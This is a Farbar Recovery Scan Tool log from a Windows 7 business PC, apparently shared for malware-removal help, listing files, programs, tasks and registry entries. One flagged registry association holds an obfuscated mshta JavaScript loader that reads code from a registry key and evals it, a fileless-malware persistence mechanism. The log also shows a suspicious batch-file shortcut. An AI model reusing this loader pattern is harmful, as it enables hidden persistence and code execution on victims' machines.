2016-11-09 15:50 - 2016-09-09 13:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-11-09 15:49 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-11-08 20:20 - 2016-11-08 20:20 - 01694784 _____ (PassMark Software ) C:\Users\cjerald\Downloads\diskcheckup.exe
2016-11-08 20:20 - 2016-11-08 20:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DiskCheckup
2016-11-08 20:20 - 2016-11-08 20:20 - 00000000 ____D C:\Program Files (x86)\DiskCheckup
2016-11-08 15:54 - 2016-11-18 19:41 - 00000988 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2016-11-08 15:53 - 2016-11-08 15:54 - 00000000 ____D C:\Program Files (x86)\LogMeIn
2016-11-08 15:53 - 2016-11-08 15:53 - 00000000 ____D C:\Users\cjerald\AppData\Local\LogMeIn
2016-11-08 15:53 - 2016-10-12 13:31 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2016-11-08 15:53 - 2016-10-12 13:31 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2016-11-08 15:53 - 2016-01-29 11:53 - 00035328 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2016-11-08 15:53 - 2013-12-10 15:15 - 00107368 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll.000.bak
2016-11-08 15:53 - 2013-11-05 16:45 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys
2016-11-08 15:51 - 2016-11-08 15:51 - 20489480 _____ C:\Users\cjerald\Downloads\LogMeIn.exe
2016-11-02 10:51 - 2016-11-15 13:02 - 18068701 _____ C:\Users\cjerald\AppData\Local\census.cache
2016-11-02 10:51 - 2016-11-15 10:31 - 00882323 _____ C:\Users\cjerald\AppData\Local\ars.cache
2016-11-02 10:50 - 2016-11-15 02:28 - 00000010 _____ C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache
2016-11-02 10:39 - 2016-11-02 10:39 - 00000000 ____D C:\Windows\Trend Micro
2016-11-02 10:39 - 2016-11-02 10:39 - 00000000 ____D C:\ProgramData\Trend Micro
2016-11-02 10:38 - 2016-11-02 10:38 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64.exe
2016-11-02 10:38 - 2016-11-02 10:38 - 00000036 _____ C:\Users\cjerald\AppData\Local\housecall.guid.cache
2016-11-02 10:32 - 2016-11-18 19:25 - 00181160 _____ C:\Windows\ntbtlog.txt
2016-11-02 10:25 - 2016-11-02 10:25 - 00144778 _____ C:\Users\cjerald\Downloads\cc_20161102_112336.reg
2016-11-02 10:18 - 2016-11-02 10:18 - 00002784 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2016-11-02 10:18 - 2016-11-02 10:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-11-02 10:18 - 2016-11-02 10:18 - 00000000 ____D C:\Program Files\CCleaner
2016-11-02 09:55 - 2016-11-02 09:55 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\AVAST Software
2016-11-02 09:54 - 2016-11-02 09:54 - 00391496 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-11-02 09:54 - 2016-11-02 09:54 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-11-02 09:54 - 2016-11-02 09:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-11-02 09:53 - 2016-11-02 10:31 - 00000000 ____D C:\ProgramData\AVAST Software
2016-11-02 09:53 - 2016-11-02 09:59 - 00000000 ____D C:\Program Files\AVAST Software
2016-11-02 09:53 - 2016-11-02 09:53 - 06253640 _____ (AVAST Software) C:\Users\cjerald\Downloads\avast_free_antivirus_setup_online_cnet_1.exe
2016-11-02 09:53 - 2016-11-02 09:53 - 00053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-11-01 12:21 - 2016-11-01 12:21 - 05658651 ____R (Swearware) C:\Users\cjerald\Downloads\ComboFix.exe
2016-11-01 11:53 - 2016-11-19 15:53 - 00000000 ____D C:\Program Files (x86)\Slimjet
2016-11-01 11:53 - 2016-11-01 11:53 - 00000000 ____D C:\Users\cjerald\AppData\Local\Slimjet
2016-11-01 11:53 - 2016-11-01 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashPeak Slimjet

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-19 16:22 - 2014-03-11 14:03 - 00000574 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job
2016-11-19 16:16 - 2014-02-03 15:59 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-11-19 16:14 - 2015-02-24 13:15 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-19 16:09 - 2013-12-17 09:58 - 00000000 ____D C:\ProgramData\LogMeIn
2016-11-19 16:08 - 2015-06-05 11:31 - 00000670 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job
2016-11-19 15:44 - 2015-02-24 13:15 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-19 15:44 - 2013-12-17 12:00 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl
2016-11-19 15:36 - 2014-02-03 15:59 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-19 14:09 - 2013-12-17 15:29 - 00003914 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{6EA3AC3A-126A-4AFB-8EF2-29F1B0AD6D53}
2016-11-19 08:36 - 2014-02-03 15:59 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-19 04:39 - 2009-07-13 23:45 - 00022096 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-19 04:39 - 2009-07-13 23:45 - 00022096 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-18 19:40 - 2013-12-12 13:16 - 00000000 ____D C:\ProgramData\NVIDIA
2016-11-18 19:40 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-18 19:16 - 2009-07-14 00:37 - 00000000 ____D C:\Windows\DigitalLocker
2016-11-18 16:04 - 2013-12-17 12:02 - 00000000 ____D C:\Users\cjerald
2016-11-18 15:39 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI
2016-11-18 15:36 - 2015-04-16 07:28 - 00000000 ____D C:\Windows\system32\appraiser
2016-11-18 15:36 - 2014-05-06 18:09 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-11-18 15:21 - 2009-07-14 00:13 - 00785942 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-18 15:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-11-17 10:37 - 2014-07-24 12:50 - 00000000 ____D C:\Users\cjerald\AppData\Local\ElevatedDiagnostics
2016-11-16 22:13 - 2015-11-25 13:59 - 00000000 ____D C:\Program Files (x86)\Backblaze
2016-11-16 21:31 - 2009-07-13 22:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-11-16 21:18 - 2013-12-17 12:11 - 00000000 ____D C:\Users\clayton
2016-11-16 14:14 - 2014-10-19 10:08 - 00000000 ____D C:\Users\cjerald\AppData\Local\CrashDumps
2016-11-16 10:52 - 2014-02-03 15:59 - 00000000 ____D C:\Users\cjerald\AppData\Local\Google
2016-11-16 08:05 - 2013-12-17 15:38 - 00000000 ____D C:\ProgramData\Oracle
2016-11-16 07:53 - 2013-12-17 15:38 - 00269888 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2016-11-16 02:34 - 2013-12-17 12:26 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2016-11-16 02:34 - 2013-12-17 12:26 - 00008222 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2016-11-16 02:34 - 2013-12-17 12:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Symantec Endpoint Protection
2016-11-16 02:32 - 2013-12-17 12:24 - 00577392 _____ (Symantec Corporation) C:\Windows\system32\SymVPN.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00421232 _____ (Symantec Corporation) C:\Windows\SysWOW64\SymVPN.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00158576 _____ (Symantec Corporation) C:\Windows\system32\FwsVpn.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00155472 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SysPlant.sys
2016-11-16 02:32 - 2013-12-17 12:24 - 00136560 _____ (Symantec Corporation) C:\Windows\SysWOW64\FwsVpn.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00045088 _____ (Symantec Corporation) C:\Windows\system32\Drivers\WGX64.SYS
2016-11-14 20:42 - 2014-02-03 16:00 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-14 19:07 - 2015-09-18 09:44 - 00000000 ____D C:\Qoobox
2016-11-14 19:03 - 2009-07-13 21:34 - 00000215 _____ C:\Windows\system.ini
2016-11-14 18:09 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Registration
2016-11-14 17:47 - 2009-07-14 00:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-11-14 13:00 - 2013-12-12 12:40 - 00000000 ____D C:\Program Files\Intel
2016-11-10 12:56 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache
2016-11-10 07:57 - 2009-07-13 23:45 - 00402552 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-09 17:30 - 2013-12-12 13:52 - 00000000 ____D C:\Windows\system32\MRT
2016-11-09 17:08 - 2013-12-12 13:52 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-11-08 20:33 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\PLA
2016-11-08 20:12 - 2013-12-12 13:03 - 00000000 ____D C:\Drivers & Utilities
2016-11-08 15:54 - 2013-12-17 09:58 - 00001024 _____ C:\.rnd
2016-11-02 10:22 - 2013-12-11 21:00 - 00000000 ____D C:\Windows\Panther
2016-11-02 09:54 - 2016-04-13 13:28 - 00000000 ____D C:\Program Files\Common Files\AV
2016-11-02 07:45 - 2015-06-05 11:31 - 00003690 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148
2016-11-02 07:45 - 2014-03-11 14:03 - 00003594 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148
2016-11-01 11:32 - 2015-02-24 13:15 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-01 10:23 - 2015-02-24 13:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-10-20 13:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\LiveKernelReports

==================== Files in the root of some directories =======

2016-11-02 10:51 - 2016-11-15 10:31 - 0882323 _____ () C:\Users\cjerald\AppData\Local\ars.cache
2016-11-02 10:51 - 2016-11-15 13:02 - 18068701 _____ () C:\Users\cjerald\AppData\Local\census.cache
2016-11-02 10:38 - 2016-11-02 10:38 - 0000036 _____ () C:\Users\cjerald\AppData\Local\housecall.guid.cache
2016-11-02 10:50 - 2016-11-15 02:28 - 0000010 _____ () C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache
2014-03-12 18:30 - 2014-03-12 18:30 - 0000095 _____ () C:\ProgramData\SAH_Install.ini

Some files in TEMP:
====================
C:\Users\cjerald\AppData\Local\Temp\libeay32.dll
C:\Users\cjerald\AppData\Local\Temp\msvcr120.dll
C:\Users\cjerald\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-11-16 06:13

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-11-2016 01
Ran by CJerald (19-11-2016 16:33:05)
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Windows 7 Professional Service Pack 1 (X64) (2013-12-12 14:41:32)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-343821754-1919214937-3281495952-500 - Administrator - Disabled)
Guest (S-1-5-21-343821754-1919214937-3281495952-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.8 - Adobe Systems)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Backblaze (HKLM-x32\...\Backblaze) (Version:  - Backblaze, Inc)
Canon MF Toolbox 4.9.1.1.mf09 (HKLM-x32\...\{6767DFEE-8909-453A-B553-C7693912B2EB}) (Version: 3.2.0 - Canon)
Canon MF8300 Series (HKLM\...\{E47364AA-6B5E-45a2-B94F-BC5D9D6A0338}) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix)
CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.)
CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden
CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden
DiskCheckup v3.4 (HKLM-x32\...\DiskCheckup_is1) (Version: 3.4.1002 - PassMark Software)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 12.0.6.0 - FlashPeak Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.)
GoToAssist Customer 2.7.0.1092 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.7.0.1092 - Citrix Online)
GoToMeeting 7.26.0.5808 (HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\GoToMeeting) (Version: 7.26.0.5808 - CitrixOnline)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.0.157.1 - Intel Security)
Intel® Network Connections 21.1.30.0 (HKLM\...\PROSetDX) (Version: 21.1.30.0 - Intel)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
marvell 91xx driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1047 - Marvell)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyDefrag v4.3.1 (HKLM\...\MyDefrag v4.3.1_is1) (Version: 4.0.0.0 - J.C. Kessels)
NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6257 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.26.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.26.0 - Renesas Electronics Corporation) Hidden
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version:  - Roadkil.Net)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.5800 - Broadcom Corporation)
Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5636\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00CE36DB-6A59-4EDB-9CE8-3D9F4F58544F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-26] (Adobe Systems Incorporated)
Task: {67103020-3F8F-4EDA-8E62-70B7D54ACB04} - System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe [2016-11-02] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {748E8811-5D55-4A95-920A-A2AB97876CA2} - System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe [2016-11-02] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {791D2EF3-CC5F-456B-BA1D-73D0FF09CA20} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7C218579-20A7-4E64-865C-4259D7EE197E} - System32\Tasks\{F111F422-023F-4E16-B5C9-51B124B93F42} => C:\Program Files (x86)\Canon\MF Toolbox Ver4.9\MFTBOX.exe [2009-06-22] (CANON INC.)
Task: {7F116B38-B214-4CB7-8D57-75B6AD0DA29B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {90796BBB-1718-4BBD-90E0-BD8974C45185} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-01] (McAfee, Inc.)
Task: {CAA82495-2800-4590-9E6F-20FBD34E3713} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-11-02] (AVAST Software)
Task: {CAD262DC-4394-4840-AF0D-12204F01BD2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat ()

==================== Loaded Modules (Whitelisted) ==============

2015-11-25 14:00 - 2016-11-16 22:12 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe
2013-12-12 13:16 - 2015-08-17 19:07 - 00115376 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd: "C:\Windows\system32\mshta.exe" "javascript:iPH9j5="V15iBXVx";s12d=new ActiveXObject("WScript.Shell");M40aWd="cEsTuKN";TtXA7=s12d.RegRead("HKCU\\software\\auux\\onnlw");FU76Gv="LccebV4j";eval(TtXA7);Br6Aj="O1GiJK";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-11-01 12:29 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Control Panel\Desktop\\Wallpaper -> C:\Users\cjerald\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.105 - 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: Intel® PROSet Monitoring Service => 2
MSCONFIG\Services: LMIGuardianSvc => 2
MSCONFIG\Services: LMIMaint => 2
MSCONFIG\Services: LogMeIn => 2
MSCONFIG\Services: UNS => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: LogMeIn GUI => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
